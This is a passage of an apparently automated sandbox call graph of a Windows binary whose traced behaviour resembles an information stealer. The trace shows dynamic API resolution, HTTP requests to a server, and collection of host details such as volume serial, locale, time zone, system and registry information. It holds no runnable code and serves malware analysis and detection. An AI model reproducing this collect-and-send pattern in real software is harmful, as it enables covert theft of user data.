calls 14203->14204 14205 79423e 14204->14205 14206 7945c0 2 API calls 14205->14206 14207 794257 14206->14207 14208 7945c0 2 API calls 14207->14208 14209 794270 14208->14209 14210 7945c0 2 API calls 14209->14210 14211 794289 14210->14211 14212 7945c0 2 API calls 14211->14212 14213 7942a2 14212->14213 14214 7945c0 2 API calls 14213->14214 14215 7942bb 14214->14215 14216 7945c0 2 API calls 14215->14216 14217 7942d4 14216->14217 14218 7945c0 2 API calls 14217->14218 14219 7942ed 14218->14219 14220 7945c0 2 API calls 14219->14220 14221 794306 14220->14221 14222 7945c0 2 API calls 14221->14222 14223 79431f 14222->14223 14224 7945c0 2 API calls 14223->14224 14225 794338 14224->14225 14226 7945c0 2 API calls 14225->14226 14227 794351 14226->14227 14228 7945c0 2 API calls 14227->14228 14229 79436a 14228->14229 14230 7945c0 2 API calls 14229->14230 14231 794383 14230->14231 14232 7945c0 2 API calls 14231->14232 14233 79439c 14232->14233 14234 7945c0 2 API calls 14233->14234 14235 7943b5 14234->14235 14236 7945c0 2 API calls 14235->14236 14237 7943ce 14236->14237 14238 7945c0 2 API calls 14237->14238 14239 7943e7 14238->14239 14240 7945c0 2 API calls 14239->14240 14241 794400 14240->14241 14242 7945c0 2 API calls 14241->14242 14243 794419 14242->14243 14244 7945c0 2 API calls 14243->14244 14245 794432 14244->14245 14246 7945c0 2 API calls 14245->14246 14247 79444b 14246->14247 14248 7945c0 2 API calls 14247->14248 14249 794464 14248->14249 14250 7945c0 2 API calls 14249->14250 14251 79447d 14250->14251 14252 7945c0 2 API calls 14251->14252 14253 794496 14252->14253 14254 7945c0 2 API calls 14253->14254 14255 7944af 14254->14255 14256 7945c0 2 API calls 14255->14256 14257 7944c8 14256->14257 14258 7945c0 2 API calls 14257->14258 14259 7944e1 14258->14259 14260 7945c0 2 API calls 14259->14260 14261 7944fa 14260->14261 14262 7945c0 2 API calls 14261->14262 14263 794513 14262->14263 14264 7945c0 2 API calls 14263->14264 14265 79452c 14264->14265 14266 7945c0 2 API calls 14265->14266 14267 794545 14266->14267 14268 7945c0 2 API calls 14267->14268 14269 79455e 14268->14269 14270 7945c0 2 API calls 14269->14270 14271 794577 14270->14271 14272 7945c0 2 API calls 14271->14272 14273 794590 14272->14273 14274 7945c0 2 API calls 14273->14274 14275 7945a9 14274->14275 14276 7a9c10 14275->14276 14277 7a9c20 43 API calls 14276->14277 14278 7aa036 8 API calls 14276->14278 14277->14278 14279 7aa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14278->14279 14280 7aa146 14278->14280 14279->14280 14281 7aa153 8 API calls 14280->14281 14282 7aa216 14280->14282 14281->14282 14283 7aa298 14282->14283 14284 7aa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14282->14284 14285 7aa337 14283->14285 14286 7aa2a5 6 API calls 14283->14286 14284->14283 14287 7aa41f 14285->14287 14288 7aa344 9 API calls 14285->14288 14286->14285 14289 7aa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14287->14289 14290 7aa4a2 14287->14290 14288->14287 14289->14290 14291 7aa4ab GetProcAddress GetProcAddress 14290->14291 14292 7aa4dc 14290->14292 14291->14292 14293 7aa515 14292->14293 14294 7aa4e5 GetProcAddress GetProcAddress 14292->14294 14295 7aa612 14293->14295 14296 7aa522 10 API calls 14293->14296 14294->14293 14297 7aa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14295->14297 14298 7aa67d 14295->14298 14296->14295 14297->14298 14299 7aa69e 14298->14299 14300 7aa686 GetProcAddress 14298->14300 14301 7a5ca3 14299->14301 14302 7aa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14299->14302 14300->14299 14303 791590 14301->14303 14302->14301 15424 791670 14303->15424 14306 7aa7a0 lstrcpy 14307 7915b5 14306->14307 14308 7aa7a0 lstrcpy 14307->14308 14309 7915c7 14308->14309 14310 7aa7a0 lstrcpy 14309->14310 14311 7915d9 14310->14311 14312 7aa7a0 lstrcpy 14311->14312 14313 791663 14312->14313 14314 7a5510 14313->14314 14315 7a5521 14314->14315 14316 7aa820 2 API calls 14315->14316 14317 7a552e 14316->14317 14318 7aa820 2 API calls 14317->14318 14319 7a553b 14318->14319 14320 7aa820 2 API calls 14319->14320 14321 7a5548 14320->14321 14322 7aa740 lstrcpy 14321->14322 14323 7a5555 14322->14323 14324 7aa740 lstrcpy 14323->14324 14325 7a5562 14324->14325 14326 7aa740 lstrcpy 14325->14326 14327 7a556f 14326->14327 14328 7aa740 lstrcpy 14327->14328 14368 7a557c 14328->14368 14329 7aa820 lstrlen lstrcpy 14329->14368 14330 7aa740 lstrcpy 14330->14368 14331 7aa7a0 lstrcpy 14331->14368 14332 7aa8a0 lstrcpy 14332->14368 14333 7a5643 StrCmpCA 14333->14368 14334 7a56a0 StrCmpCA 14335 7a57dc 14334->14335 14334->14368 14336 7aa8a0 lstrcpy 14335->14336 14337 7a57e8 14336->14337 14338 7aa820 2 API calls 14337->14338 14341 7a57f6 14338->14341 14339 7a5856 StrCmpCA 14343 7a5991 14339->14343 14339->14368 14340 7a51f0 20 API calls 14340->14368 14342 7aa820 2 API calls 14341->14342 14344 7a5805 14342->14344 14345 7aa8a0 lstrcpy 14343->14345 14346 791670 lstrcpy 14344->14346 14347 7a599d 14345->14347 14366 7a5811 14346->14366 14348 7aa820 2 API calls 14347->14348 14349 7a59ab 14348->14349 14352 7aa820 2 API calls 14349->14352 14350 7a5a0b StrCmpCA 14353 7a5a28 14350->14353 14354 7a5a16 Sleep 14350->14354 14351 7a52c0 25 API calls 14351->14368 14355 7a59ba 14352->14355 14356 7aa8a0 lstrcpy 14353->14356 14354->14368 14357 791670 lstrcpy 14355->14357 14358 7a5a34 14356->14358 14357->14366 14359 7aa820 2 API calls 14358->14359 14360 7a5a43 14359->14360 14361 7aa820 2 API calls 14360->14361 14362 7a5a52 14361->14362 14364 791670 lstrcpy 14362->14364 14363 7a578a StrCmpCA 14363->14368 14364->14366 14365 7a593f StrCmpCA 14365->14368 14366->13421 14367 791590 lstrcpy 14367->14368 14368->14329 14368->14330 14368->14331 14368->14332 14368->14333 14368->14334 14368->14339 14368->14340 14368->14350 14368->14351 14368->14363 14368->14365 14368->14367 14370 7a754c 14369->14370 14371 7a7553 GetVolumeInformationA 14369->14371 14370->14371 14375 7a7591 14371->14375 14372 7a75fc GetProcessHeap RtlAllocateHeap 14373 7a7628 wsprintfA 14372->14373 14374 7a7619 14372->14374 14377 7aa740 lstrcpy 14373->14377 14376 7aa740 lstrcpy 14374->14376 14375->14372 14378 7a5da7 14376->14378 14377->14378 14378->13442 14380 7aa7a0 lstrcpy 14379->14380 14381 794899 14380->14381 15433 7947b0 14381->15433 14383 7948a5 14384 7aa740 lstrcpy 14383->14384 14385 7948d7 14384->14385 14386 7aa740 lstrcpy 14385->14386 14387 7948e4 14386->14387 14388 7aa740 lstrcpy 14387->14388 14389 7948f1 14388->14389 14390 7aa740 lstrcpy 14389->14390 14391 7948fe 14390->14391 14392 7aa740 lstrcpy 14391->14392 14393 79490b InternetOpenA StrCmpCA 14392->14393 14394 794944 14393->14394 14395 794ecb InternetCloseHandle 14394->14395 15439 7a8b60 14394->15439 14397 794ee8 14395->14397 15454 799ac0 CryptStringToBinaryA 14397->15454 14398 794963 15447 7aa920 14398->15447 14401 794976 14403 7aa8a0 lstrcpy 14401->14403 14408 79497f 14403->14408 14404 7aa820 2 API calls 14405 794f05 14404->14405 14406 7aa9b0 4 API calls 14405->14406 14409 794f1b 14406->14409 14407 794f27 ctype 14411 7aa7a0 lstrcpy 14407->14411 14412 7aa9b0 4 API calls 14408->14412 14410 7aa8a0 lstrcpy 14409->14410 14410->14407 14424 794f57 14411->14424 14413 7949a9 14412->14413 14414 7aa8a0 lstrcpy 14413->14414 14415 7949b2 14414->14415 14416 7aa9b0 4 API calls 14415->14416 14417 7949d1 14416->14417 14418 7aa8a0 lstrcpy 14417->14418 14419 7949da 14418->14419 14420 7aa920 3 API calls 14419->14420 14421 7949f8 14420->14421 14422 7aa8a0 lstrcpy 14421->14422 14423 794a01 14422->14423 14425 7aa9b0 4 API calls 14423->14425 14424->13445 14426 794a20 14425->14426 14427 7aa8a0 lstrcpy 14426->14427 14428 794a29 14427->14428 14429 7aa9b0 4 API calls 14428->14429 14430 794a48 14429->14430 14431 7aa8a0 lstrcpy 14430->14431 14432 794a51 14431->14432 14433 7aa9b0 4 API calls 14432->14433 14434 794a7d 14433->14434 14435 7aa920 3 API calls 14434->14435 14436 794a84 14435->14436 14437 7aa8a0 lstrcpy 14436->14437 14438 794a8d 14437->14438 14439 794aa3 InternetConnectA 14438->14439 14439->14395 14440 794ad3 HttpOpenRequestA 14439->14440 14442 794b28 14440->14442 14443 794ebe InternetCloseHandle 14440->14443 14444 7aa9b0 4 API calls 14442->14444 14443->14395 14445 794b3c 14444->14445 14446 7aa8a0 lstrcpy 14445->14446 14447 794b45 14446->14447 14448 7aa920 3 API calls 14447->14448 14449 794b63 14448->14449 14450 7aa8a0 lstrcpy 14449->14450 14451 794b6c 14450->14451 14452 7aa9b0 4 API calls 14451->14452 14453 794b8b 14452->14453 14454 7aa8a0 lstrcpy 14453->14454 14455 794b94 14454->14455 14456 7aa9b0 4 API calls 14455->14456 14457 794bb5 14456->14457 14458 7aa8a0 lstrcpy 14457->14458 14459 794bbe 14458->14459 14460 7aa9b0 4 API calls 14459->14460 14461 794bde 14460->14461 14462 7aa8a0 lstrcpy 14461->14462 14463 794be7 14462->14463 14464 7aa9b0 4 API calls 14463->14464 14465 794c06 14464->14465 14466 7aa8a0 lstrcpy 14465->14466 14467 794c0f 14466->14467 14468 7aa920 3 API calls 14467->14468 14469 794c2d 14468->14469 14470 7aa8a0 lstrcpy 14469->14470 14471 794c36 14470->14471 14472 7aa9b0 4 API calls 14471->14472 14473 794c55 14472->14473 14474 7aa8a0 lstrcpy 14473->14474 14475 794c5e 14474->14475 14476 7aa9b0 4 API calls 14475->14476 14477 794c7d 14476->14477 14478 7aa8a0 lstrcpy 14477->14478 14479 794c86 14478->14479 14480 7aa920 3 API calls 14479->14480 14481 794ca4 14480->14481 14482 7aa8a0 lstrcpy 14481->14482 14483 794cad 14482->14483 14484 7aa9b0 4 API calls 14483->14484 14485 794ccc 14484->14485 14486 7aa8a0 lstrcpy 14485->14486 14487 794cd5 14486->14487 14488 7aa9b0 4 API calls 14487->14488 14489 794cf6 14488->14489 14490 7aa8a0 lstrcpy 14489->14490 14491 794cff 14490->14491 14492 7aa9b0 4 API calls 14491->14492 14493 794d1f 14492->14493 14494 7aa8a0 lstrcpy 14493->14494 14495 794d28 14494->14495 14496 7aa9b0 4 API calls 14495->14496 14497 794d47 14496->14497 14498 7aa8a0 lstrcpy 14497->14498 14499 794d50 14498->14499 14500 7aa920 3 API calls 14499->14500 14501 794d6e 14500->14501 14502 7aa8a0 lstrcpy 14501->14502 14503 794d77 14502->14503 14504 7aa740 lstrcpy 14503->14504 14505 794d92 14504->14505 14506 7aa920 3 API calls 14505->14506 14507 794db3 14506->14507 14508 7aa920 3 API calls 14507->14508 14509 794dba 14508->14509 14510 7aa8a0 lstrcpy 14509->14510 14511 794dc6 14510->14511 14512 794de7 lstrlen 14511->14512 14513 794dfa 14512->14513 14514 794e03 lstrlen 14513->14514 15453 7aaad0 14514->15453 14516 794e13 HttpSendRequestA 14517 794e32 InternetReadFile 14516->14517 14518 794e67 InternetCloseHandle 14517->14518 14523 794e5e 14517->14523 14521 7aa800 14518->14521 14520 7aa9b0 4 API calls 14520->14523 14521->14443 14522 7aa8a0 lstrcpy 14522->14523 14523->14517 14523->14518 14523->14520 14523->14522 15460 7aaad0 14524->15460 14526 7a17c4 StrCmpCA 14527 7a17cf ExitProcess 14526->14527 14536 7a17d7 14526->14536 14528 7a19c2 14528->13447 14529 7a187f StrCmpCA 14529->14536 14530 7a185d StrCmpCA 14530->14536 14531 7a1932 StrCmpCA 14531->14536 14532 7a1913 StrCmpCA 14532->14536 14533 7a1970 StrCmpCA 14533->14536 14534 7a18f1 StrCmpCA 14534->14536 14535 7a1951 StrCmpCA 14535->14536 14536->14528 14536->14529 14536->14530 14536->14531 14536->14532 14536->14533 14536->14534 14536->14535 14537 7a18cf StrCmpCA 14536->14537 14538 7a18ad StrCmpCA 14536->14538 14539 7aa820 lstrlen lstrcpy 14536->14539 14537->14536 14538->14536 14539->14536 14541 7aa7a0 lstrcpy 14540->14541 14542 795979 14541->14542 14543 7947b0 2 API calls 14542->14543 14544 795985 14543->14544 14545 7aa740 lstrcpy 14544->14545 14546 7959ba 14545->14546 14547 7aa740 lstrcpy 14546->14547 14548 7959c7 14547->14548 14549 7aa740 lstrcpy 14548->14549 14550 7959d4 14549->14550 14551 7aa740 lstrcpy 14550->14551 14552 7959e1 14551->14552 14553 7aa740 lstrcpy 14552->14553 14554 7959ee InternetOpenA StrCmpCA 14553->14554 14555 795a1d 14554->14555 14556 795fc3 InternetCloseHandle 14555->14556 14557 7a8b60 3 API calls 14555->14557 14558 795fe0 14556->14558 14559 795a3c 14557->14559 14561 799ac0 4 API calls 14558->14561 14560 7aa920 3 API calls 14559->14560 14562 795a4f 14560->14562 14563 795fe6 14561->14563 14564 7aa8a0 lstrcpy 14562->14564 14565 7aa820 2 API calls 14563->14565 14568 79601f ctype 14563->14568 14570 795a58 14564->14570 14566 795ffd 14565->14566 14567 7aa9b0 4 API calls 14566->14567 14569 796013 14567->14569 14572 7aa7a0 lstrcpy 14568->14572 14571 7aa8a0 lstrcpy 14569->14571 14573 7aa9b0 4 API calls 14570->14573 14571->14568 14581 79604f 14572->14581 14574 795a82 14573->14574 14575 7aa8a0 lstrcpy 14574->14575 14576 795a8b 14575->14576 14577 7aa9b0 4 API calls 14576->14577 14578 795aaa 14577->14578 14579 7aa8a0 lstrcpy 14578->14579 14580 795ab3 14579->14580 14582 7aa920 3 API calls 14580->14582 14581->13453 14583 795ad1 14582->14583 14584 7aa8a0 lstrcpy 14583->14584 14585 795ada 14584->14585 14586 7aa9b0 4 API calls 14585->14586 14587 795af9 14586->14587 14588 7aa8a0 lstrcpy 14587->14588 14589 795b02 14588->14589 14590 7aa9b0 4 API calls 14589->14590 14591 795b21 14590->14591 14592 7aa8a0 lstrcpy 14591->14592 14593 795b2a 14592->14593 14594 7aa9b0 4 API calls 14593->14594 14595 795b56 14594->14595 14596 7aa920 3 API calls 14595->14596 14597 795b5d 14596->14597 14598 7aa8a0 lstrcpy 14597->14598 14599 795b66 14598->14599 14600 795b7c InternetConnectA 14599->14600 14600->14556 14601 795bac HttpOpenRequestA 14600->14601 14603 795c0b 14601->14603 14604 795fb6 InternetCloseHandle 14601->14604 14605 7aa9b0 4 API calls 14603->14605 14604->14556 14606 795c1f 14605->14606 14607 7aa8a0 lstrcpy 14606->14607 14608 795c28 14607->14608 14609 7aa920 3 API calls 14608->14609 14610 795c46 14609->14610 14611 7aa8a0 lstrcpy 14610->14611 14612 795c4f 14611->14612 14613 7aa9b0 4 API calls 14612->14613 14614 795c6e 14613->14614 14615 7aa8a0 lstrcpy 14614->14615 14616 795c77 14615->14616 14617 7aa9b0 4 API calls 14616->14617 14618 795c98 14617->14618 14619 7aa8a0 lstrcpy 14618->14619 14620 795ca1 14619->14620 14621 7aa9b0 4 API calls 14620->14621 14622 795cc1 14621->14622 14623 7aa8a0 lstrcpy 14622->14623 14624 795cca 14623->14624 14625 7aa9b0 4 API calls 14624->14625 14626 795ce9 14625->14626 14627 7aa8a0 lstrcpy 14626->14627 14628 795cf2 14627->14628 14629 7aa920 3 API calls 14628->14629 14630 795d10 14629->14630 14631 7aa8a0 lstrcpy 14630->14631 14632 795d19 14631->14632 14633 7aa9b0 4 API calls 14632->14633 14634 795d38 14633->14634 14635 7aa8a0 lstrcpy 14634->14635 14636 795d41 14635->14636 14637 7aa9b0 4 API calls 14636->14637 14638 795d60 14637->14638 14639 7aa8a0 lstrcpy 14638->14639 14640 795d69 14639->14640 14641 7aa920 3 API calls 14640->14641 14642 795d87 14641->14642 14643 7aa8a0 lstrcpy 14642->14643 14644 795d90 14643->14644 14645 7aa9b0 4 API calls 14644->14645 14646 795daf 14645->14646 14647 7aa8a0 lstrcpy 14646->14647 14648 795db8 14647->14648 14649 7aa9b0 4 API calls 14648->14649 14650 795dd9 14649->14650 14651 7aa8a0 lstrcpy 14650->14651 14652 795de2 14651->14652 14653 7aa9b0 4 API calls 14652->14653 14654 795e02 14653->14654 14655 7aa8a0 lstrcpy 14654->14655 14656 795e0b 14655->14656 14657 7aa9b0 4 API calls 14656->14657 14658 795e2a 14657->14658 14659 7aa8a0 lstrcpy 14658->14659 14660 795e33 14659->14660 14661 7aa920 3 API calls 14660->14661 14662 795e54 14661->14662 14663 7aa8a0 lstrcpy 14662->14663 14664 795e5d 14663->14664 14665 795e70 lstrlen 14664->14665 15461 7aaad0 14665->15461 14667 795e81 lstrlen GetProcessHeap RtlAllocateHeap 15462 7aaad0 14667->15462 14669 795eae lstrlen 14670 795ebe 14669->14670 14671 795ed7 lstrlen 14670->14671 14672 795ee7 14671->14672 14673 795ef0 lstrlen 14672->14673 14674 795f04 14673->14674 14675 795f1a lstrlen 14674->14675 15463 7aaad0 14675->15463 14677 795f2a HttpSendRequestA 14678 795f35 InternetReadFile 14677->14678 14679 795f6a InternetCloseHandle 14678->14679 14683 795f61 14678->14683 14679->14604 14681 7aa9b0 4 API calls 14681->14683 14682 7aa8a0 lstrcpy 14682->14683 14683->14678 14683->14679 14683->14681 14683->14682 14686 7a1077 14684->14686 14685 7a1151 14685->13455 14686->14685 14687 7aa820 lstrlen lstrcpy 14686->14687 14687->14686 14690 7a0db7 14688->14690 14689 7a0f17 14689->13463 14690->14689 14691 7a0e27 StrCmpCA 14690->14691 14692 7a0e67 StrCmpCA 14690->14692 14693 7a0ea4 StrCmpCA 14690->14693 14694 7aa820 lstrlen lstrcpy 14690->14694 14691->14690 14692->14690 14693->14690 14694->14690 14696 7a0f67 14695->14696 14697 7a1044 14696->14697 14698 7a0fb2 StrCmpCA 14696->14698 14699 7aa820 lstrlen lstrcpy 14696->14699 14697->13471 14698->14696 14699->14696 14701 7aa740 lstrcpy 14700->14701 14702 7a1a26 14701->14702 14703 7aa9b0 4 API calls 14702->14703 14704 7a1a37 14703->14704 14705 7aa8a0 lstrcpy 14704->14705 14706 7a1a40 14705->14706 14707 7aa9b0 4 API calls 14706->14707 14708 7a1a5b 14707->14708 14709 7aa8a0 lstrcpy 14708->14709 14710 7a1a64 14709->14710 14711 7aa9b0 4 API calls 14710->14711 14712 7a1a7d 14711->14712 14713 7aa8a0 lstrcpy 14712->14713 14714 7a1a86 14713->14714 14715 7aa9b0 4 API calls 14714->14715 14716 7a1aa1 14715->14716 14717 7aa8a0 lstrcpy 14716->14717 14718 7a1aaa 14717->14718 14719 7aa9b0 4 API calls 14718->14719 14720 7a1ac3 14719->14720 14721 7aa8a0 lstrcpy 14720->14721 14722 7a1acc 14721->14722 14723 7aa9b0 4 API calls 14722->14723 14724 7a1ae7 14723->14724 14725 7aa8a0 lstrcpy 14724->14725 14726 7a1af0 14725->14726 14727 7aa9b0 4 API calls 14726->14727 14728 7a1b09 14727->14728 14729 7aa8a0 lstrcpy 14728->14729 14730 7a1b12 14729->14730 14731 7aa9b0 4 API calls 14730->14731 14732 7a1b2d 14731->14732 14733 7aa8a0 lstrcpy 14732->14733 14734 7a1b36 14733->14734 14735 7aa9b0 4 API calls 14734->14735 14736 7a1b4f 14735->14736 14737 7aa8a0 lstrcpy 14736->14737 14738 7a1b58 14737->14738 14739 7aa9b0 4 API calls 14738->14739 14740 7a1b76 14739->14740 14741 7aa8a0 lstrcpy 14740->14741 14742 7a1b7f 14741->14742 14743 7a7500 6 API calls 14742->14743 14744 7a1b96 14743->14744 14745 7aa920 3 API calls 14744->14745 14746 7a1ba9 14745->14746 14747 7aa8a0 lstrcpy 14746->14747 14748 7a1bb2 14747->14748 14749 7aa9b0 4 API calls 14748->14749 14750 7a1bdc 14749->14750 14751 7aa8a0 lstrcpy 14750->14751 14752 7a1be5 14751->14752 14753 7aa9b0 4 API calls 14752->14753 14754 7a1c05 14753->14754 14755 7aa8a0 lstrcpy 14754->14755 14756 7a1c0e 14755->14756 15464 7a7690 GetProcessHeap RtlAllocateHeap 14756->15464 14759 7aa9b0 4 API calls 14760 7a1c2e 14759->14760 14761 7aa8a0 lstrcpy 14760->14761 14762 7a1c37 14761->14762 14763 7aa9b0 4 API calls 14762->14763 14764 7a1c56 14763->14764 14765 7aa8a0 lstrcpy 14764->14765 14766 7a1c5f 14765->14766 14767 7aa9b0 4 API calls 14766->14767 14768 7a1c80 14767->14768 14769 7aa8a0 lstrcpy 14768->14769 14770 7a1c89 14769->14770 15471 7a77c0 GetCurrentProcess IsWow64Process 14770->15471 14773 7aa9b0 4 API calls 14774 7a1ca9 14773->14774 14775 7aa8a0 lstrcpy 14774->14775 14776 7a1cb2 14775->14776 14777 7aa9b0 4 API calls 14776->14777 14778 7a1cd1 14777->14778 14779 7aa8a0 lstrcpy 14778->14779 14780 7a1cda 14779->14780 14781 7aa9b0 4 API calls 14780->14781 14782 7a1cfb 14781->14782 14783 7aa8a0 lstrcpy 14782->14783 14784 7a1d04 14783->14784 14785 7a7850 3 API calls 14784->14785 14786 7a1d14 14785->14786 14787 7aa9b0 4 API calls 14786->14787 14788 7a1d24 14787->14788 14789 7aa8a0 lstrcpy 14788->14789 14790 7a1d2d 14789->14790 14791 7aa9b0 4 API calls 14790->14791 14792 7a1d4c 14791->14792 14793 7aa8a0 lstrcpy 14792->14793 14794 7a1d55 14793->14794 14795 7aa9b0 4 API calls 14794->14795 14796 7a1d75 14795->14796 14797 7aa8a0 lstrcpy 14796->14797 14798 7a1d7e 14797->14798 14799 7a78e0 3 API calls 14798->14799 14800 7a1d8e 14799->14800 14801 7aa9b0 4 API calls 14800->14801 14802 7a1d9e 14801->14802 14803 7aa8a0 lstrcpy 14802->14803 14804 7a1da7 14803->14804 14805 7aa9b0 4 API calls 14804->14805 14806 7a1dc6 14805->14806 14807 7aa8a0 lstrcpy 14806->14807 14808 7a1dcf 14807->14808 14809 7aa9b0 4 API calls 14808->14809 14810 7a1df0 14809->14810 14811 7aa8a0 lstrcpy 14810->14811 14812 7a1df9 14811->14812 15473 7a7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14812->15473 14815 7aa9b0 4 API calls 14816 7a1e19 14815->14816 14817 7aa8a0 lstrcpy 14816->14817 14818 7a1e22 14817->14818 14819 7aa9b0 4 API calls 14818->14819 14820 7a1e41 14819->14820 14821 7aa8a0 lstrcpy 14820->14821 14822 7a1e4a 14821->14822 14823 7aa9b0 4 API calls 14822->14823 14824 7a1e6b 14823->14824 14825 7aa8a0 lstrcpy 14824->14825 14826 7a1e74 14825->14826 15475 7a7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14826->15475 14829 7aa9b0 4 API calls 14830 7a1e94 14829->14830 14831 7aa8a0 lstrcpy 14830->14831 14832 7a1e9d 14831->14832 14833 7aa9b0 4 API calls 14832->14833 14834 7a1ebc 14833->14834 14835 7aa8a0 lstrcpy 14834->14835 14836 7a1ec5 14835->14836 14837 7aa9b0 4 API calls 14836->14837 14838 7a1ee5 14837->14838 14839 7aa8a0 lstrcpy 14838->14839 14840 7a1eee 14839->14840 15478 7a7b00 GetUserDefaultLocaleName 14840->15478 14843 7aa9b0 4 API calls 14844 7a1f0e 14843->14844 14845 7aa8a0 lstrcpy 14844->14845 14846 7a1f17 14845->14846 14847 7aa9b0 4 API calls 14846->14847 14848 7a1f36 14847->14848 14849 7aa8a0 lstrcpy 14848->14849 14850 7a1f3f 14849->14850 14851 7aa9b0 4 API calls 14850->14851 14852 7a1f60 14851->14852 14853 7aa8a0 lstrcpy 14852->14853 14854 7a1f69 14853->14854 15482 7a7b90 14854->15482 14856 7a1f80 14857 7aa920 3 API calls 14856->14857 14858 7a1f93 14857->14858 14859 7aa8a0 lstrcpy 14858->14859 14860 7a1f9c 14859->14860 14861 7aa9b0 4 API calls 14860->14861 14862 7a1fc6 14861->14862 14863 7aa8a0 lstrcpy 14862->14863 14864 7a1fcf 14863->14864 14865 7aa9b0 4 API calls 14864->14865 14866 7a1fef 14865->14866 14867 7aa8a0 lstrcpy 14866->14867 14868 7a1ff8 14867->14868 15494 7a7d80 GetSystemPowerStatus 14868->15494 14871 7aa9b0 4 API calls 14872 7a2018 14871->14872 14873 7aa8a0 lstrcpy 14872->14873 14874 7a2021 14873->14874 14875 7aa9b0 4 API calls 14874->14875 14876 7a2040 14875->14876 14877 7aa8a0 lstrcpy 14876->14877 14878 7a2049 14877->14878 14879 7aa9b0 4 API calls 14878->14879 14880 7a206a 14879->14880 14881 7aa8a0 lstrcpy 14880->14881 14882 7a2073 14881->14882 14883 7a207e GetCurrentProcessId 14882->14883 15496 7a9470 OpenProcess 14883->15496 14886 7aa920 3 API calls 14887 7a20a4 14886->14887 14888 7aa8a0 lstrcpy 14887->14888 14889 7a20ad 14888->14889 14890 7aa9b0 4 API calls 14889->14890 14891 7a20d7 14890->14891 14892 7aa8a0 lstrcpy 14891->14892 14893 7a20e0 14892->14893 14894 7aa9b0 4 API calls 14893->14894 14895 7a2100 14894->14895 14896 7aa8a0 lstrcpy 14895->14896 14897 7a2109 14896->14897 15501 7a7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14897->15501 14900 7aa9b0 4 API calls 14901 7a2129 14900->14901 14902 7aa8a0 lstrcpy 14901->14902 14903 7a2132 14902->14903 14904 7aa9b0 4 API calls 14903->14904 14905 7a2151 14904->14905 14906 7aa8a0 lstrcpy 14905->14906 14907 7a215a 14906->14907 14908 7aa9b0 4 API calls 14907->14908 14909 7a217b 14908->14909 14910 7aa8a0 lstrcpy 14909->14910 14911 7a2184 14910->14911 15505 7a7f60 14911->15505 14914 7aa9b0 4 API calls 14915 7a21a4 14914->14915 14916 7aa8a0 lstrcpy 14915->14916 14917 7a21ad 14916->14917 14918 7aa9b0 4 API calls 14917->14918 14919 7a21cc 14918->14919 14920 7aa8a0 lstrcpy 14919->14920 14921 7a21d5 14920->14921 14922 7aa9b0 4 API calls 14921->14922 14923 7a21f6 14922->14923 14924 7aa8a0 lstrcpy 14923->14924 14925 7a21ff 14924->14925 15518 7a7ed0 GetSystemInfo wsprintfA 14925->15518 14928 7aa9b0 4 API calls 14929 7a221f 14928->14929 14930 7aa8a0 lstrcpy 14929->14930 14931 7a2228 14930->14931 14932 7aa9b0 4 API calls 14931->14932 14933 7a2247 14932->14933 14934 7aa8a0 lstrcpy 14933->14934 14935 7a2250 14934->14935 14936 7aa9b0 4 API calls 14935->14936 14937 7a2270 14936->14937 14938 7aa8a0 lstrcpy 14937->14938 14939 7a2279 14938->14939 15520 7a8100 GetProcessHeap RtlAllocateHeap 14939->15520 14942 7aa9b0 4 API calls 14943 7a2299 14942->14943 14944 7aa8a0 lstrcpy 14943->14944 14945 7a22a2 14944->14945 14946 7aa9b0 4 API calls 14945->14946 14947 7a22c1 14946->14947 14948 7aa8a0 lstrcpy 14947->14948 14949 7a22ca 14948->14949 14950 7aa9b0 4 API calls 14949->14950 14951 7a22eb 14950->14951 14952 7aa8a0 lstrcpy 14951->14952 14953 7a22f4 14952->14953 15526 7a87c0 14953->15526 14956 7aa920 3 API calls 14957 7a231e 14956->14957 14958 7aa8a0 lstrcpy 14957->14958 14959 7a2327 14958->14959 14960 7aa9b0 4 API calls 14959->14960 14961 7a2351 14960->14961 14962 7aa8a0 lstrcpy 14961->14962 14963 7a235a 14962->14963 14964 7aa9b0 4 API calls 14963->14964 14965 7a237a 14964->14965 14966 7aa8a0 lstrcpy 14965->14966 14967 7a2383 14966->14967 14968 7aa9b0 4 API calls 14967->14968 14969 7a23a2 14968->14969 14970 7aa8a0 lstrcpy 14969->14970 14971 7a23ab 14970->14971 15531 7a81f0 14971->15531 14973 7a23c2 14974 7aa920 3 API calls 14973->14974 14975 7a23d5 14974->14975 14976 7aa8a0 lstrcpy 14975->14976 14977 7a23de 14976->14977 14978 7aa9b0 4 API calls 14977->14978 14979 7a240a 14978->14979 14980 7aa8a0 lstrcpy 14979->14980 14981 7a2413 14980->14981 14982 7aa9b0 4 API calls 14981->14982 14983 7a2432 14982->14983 14984 7aa8a0 lstrcpy 14983->14984 14985 7a243b 14984->14985 14986 7aa9b0 4 API calls 14985->14986 14987 7a245c 14986->14987 14988 7aa8a0 lstrcpy 14987->14988 14989 7a2465 14988->14989 14990 7aa9b0 4 API calls 14989->14990 14991 7a2484 14990->14991 14992 7aa8a0 lstrcpy 14991->14992 14993 7a248d 14992->14993 14994 7aa9b0 4 API calls 14993->14994 14995 7a24ae 14994->14995 14996 7aa8a0 lstrcpy 14995->14996 14997 7a24b7 14996->14997 15539 7a8320 14997->15539 14999 7a24d3 15000 7aa920 3 API calls 14999->15000 15001 7a24e6 15000->15001 15002 7aa8a0 lstrcpy 15001->15002 15003 7a24ef 15002->15003 15004 7aa9b0 4 API calls 15003->15004 15005 7a2519 15004->15005 15006 7aa8a0 lstrcpy 15005->15006 15007 7a2522 15006->15007 15008 7aa9b0 4 API calls 15007->15008 15009 7a2543 15008->15009 15010 7aa8a0 lstrcpy 15009->15010 15011 7a254c 15010->15011 15012 7a8320 17 API calls 15011->15012 15013 7a2568 15012->15013 15014 7aa920 3 API calls 15013->15014 15015 7a257b 15014->15015 15016 7aa8a0 lstrcpy 15015->15016 15017 7a2584 15016->15017 15018 7aa9b0 4 API calls 15017->15018 15019 7a25ae 15018->15019 15020 7aa8a0 lstrcpy 15019->15020 15021 7a25b7 15020->15021 15022 7aa9b0 4 API calls 15021->15022 15023 